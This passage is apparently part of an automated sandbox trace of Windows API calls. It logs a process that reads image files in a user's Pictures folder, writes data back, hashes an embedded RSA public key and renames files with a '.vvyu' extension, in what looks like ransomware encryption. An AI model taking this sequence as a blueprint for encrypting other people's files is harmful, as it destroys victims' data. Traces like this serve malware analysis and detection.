hHeap=0x6a0000) returned 1 [0187.317] GetCurrentThreadId () returned 0x264 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39748 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b98 | out: hHeap=0x6a0000) returned 1 [0187.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.325] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x16b5c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x16b5c, lpOverlapped=0x0) returned 1 [0187.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.326] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16b61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.327] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.328] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.330] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.330] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.330] CloseHandle (hObject=0x584) returned 1 [0187.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0187.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.332] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\9p8OG.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\9p8og.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\9p8OG.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\9p8og.bmp.vvyu")) returned 1 [0187.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.334] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.337] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a755d0, ftCreationTime.dwHighDateTime=0x1d89ef1, ftLastAccessTime.dwLowDateTime=0xcf7c06d0, ftLastAccessTime.dwHighDateTime=0x1d8a4fe, ftLastWriteTime.dwLowDateTime=0xcf7c06d0, ftLastWriteTime.dwHighDateTime=0x1d8a4fe, nFileSizeHigh=0x0, nFileSizeLow=0x154b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a8cSBpx3PB.jpg", cAlternateFileName="A8CSBP~1.JPG")) returned 1 [0187.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b98 [0187.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b98 | out: hHeap=0x6a0000) returned 1 [0187.337] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\a8cSBpx3PB.jpg") returned=".jpg" [0187.337] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\a8cSBpx3PB.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\a8csbpx3pb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.339] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=87223) returned 1 [0187.339] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.343] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15491, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.343] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.346] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.346] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x154b7, lpOverlapped=0x0) returned 1 [0187.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.347] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.348] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.348] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.348] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.348] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.348] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.348] GetLastError () returned 0x0 [0187.348] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.348] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.349] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.349] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.349] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x154c0) returned 0x2d43778 [0187.350] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b98 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38be0 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.351] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39730 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.353] HeapFree (in: 